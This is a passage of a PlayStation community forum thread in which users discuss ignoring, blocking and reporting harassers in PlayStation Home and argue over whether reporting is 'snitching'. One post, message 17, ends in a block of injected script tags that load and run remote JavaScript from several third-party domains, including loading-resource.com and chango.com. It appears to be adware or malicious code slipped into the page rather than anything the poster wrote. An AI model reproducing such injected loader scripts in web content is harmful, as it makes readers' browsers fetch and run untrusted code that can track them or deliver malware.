Search instead for 
Do you mean 
PlayStation MVP
6126 posts

Re: reporting users?

[ Edited ]
Nov 16, 2012

Joanna_Dark_ wrote:

Ignore now blocks text, ALL EMOTES – no dancing on your avatar etc –, and places the avatar a few feet away with their back turned and the word ignore under their name. I'm not sure about the add to block list. I don't believe that happens when you simply ignore someone. I just checked the drop down menu in the chat box and don't see an add to block list option there either. 

See none of that happens for me when I do the simple ignore function, I think I had a bad download the last time we had to update, I have to go into select and block a person,  I knew something was wrong with my version when people kept telling me all I had to do was press ignore and I get all the bells and whistles, Anyway I'm too lazy to install and redownload. But yeah I had to block this person because he kept PM me even when I left the area.

Image and video hosting by TinyPic
Message 11 of 29 (398 Views)
0 Likes
PlayStation MVP
29219 posts

[ Edited ]
Nov 16, 2012

Well i just tested Pm's on my alternate account. I put her on ignore and then had her try and pm me via the chat window. I did get to see the Pm text in her text window but nothing showed up in mine on my other screen.

The ignore feature did not prevent her from sending me an xmb pm however. 

Message 12 of 29 (392 Views)
Lombax Warrior
148 posts

Nov 16, 2012

Joanna_Dark_ wrote:

Well i just tested Pm's on my alternate account. I put her on ignore and then had her try and pm me via the chat window. I did get to see the Pm text in her text window but nothing showed up in mine on my other screen.

You probably know this Joanna, but I find locking / blocking random pm mgs via xmb under privacy settings  by setting msgs to friends only. It works great!

Message 13 of 29 (378 Views)
0 Likes
PlayStation MVP
29219 posts

Nov 16, 2012

GunShot_Tech9 wrote:

Joanna_Dark_ wrote:

You probably know this Joanna, but I find locking / blocking random pm mgs via xmb under privacy settings  by setting msgs to friends only. It works great!

I know but I don't want to be in a position where real legitimate people can't pm me because they are not on my list. I luckily have had very little trouble with trolls abusing the xmb feature other than "wut's up", "how are you" and things along that line. 

Message 14 of 29 (372 Views)
0 Likes
First Son
3 posts

Nov 17, 2012
Stop Snitching
Message 15 of 29 (351 Views)
Treasure Hunter
5381 posts

Nov 17, 2012
Nothing wrong with snitching...don't be a threat to those who are trying to clean Home.
Message 16 of 29 (344 Views)
Lombax Warrior
136 posts

Nov 17, 2012

i usually leave right away if it's lagging n then report the person that way there's a guarantee that u don't get kicked n can't report after dcing. just make sure when u report someone u haven't said r done nything offensive in retaliation n get in trouble urself. sometimes people wanna fight back n that tends to get that person in trouble best to block/ignore leave n then report then u dont' get in trouble

<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script> <script id="__changoScript" type="text/javascript">// var __chd__ = {'aid':11079,'chaid':'www_objectify_ca'};(function() { var c = document.createElement('script'); c.type = 'text/javascript'; c.async = true;c.src=( 'https:' == document.location.protocol ? 'https://z': 'http://p') + '.chango.com/static/c.js'; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(c, s);})(); // </script> <script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=__magnetic.init"></script>
Message 17 of 29 (323 Views)
0 Likes
PlayStation MVP
1026 posts

[ Edited ]
Nov 17, 2012

rramsdell is right if you do the crime you should get ban but If you don't you have nothing to worry about. You shouldn't be afraid to report.

Message 18 of 29 (304 Views)
PlayStation MVP
1026 posts

Nov 17, 2012
Loyaltyryda_para if you been on home as long as all of us you know you have to report some people. I not saying you haven't but I ok snitch if you have too.

Message 19 of 29 (281 Views)
Survivor
1691 posts

[ Edited ]
Mar 4, 2013
Lol. Dude, this isn't a Blacklist thread.
Message 20 of 29 (209 Views)
0 Likes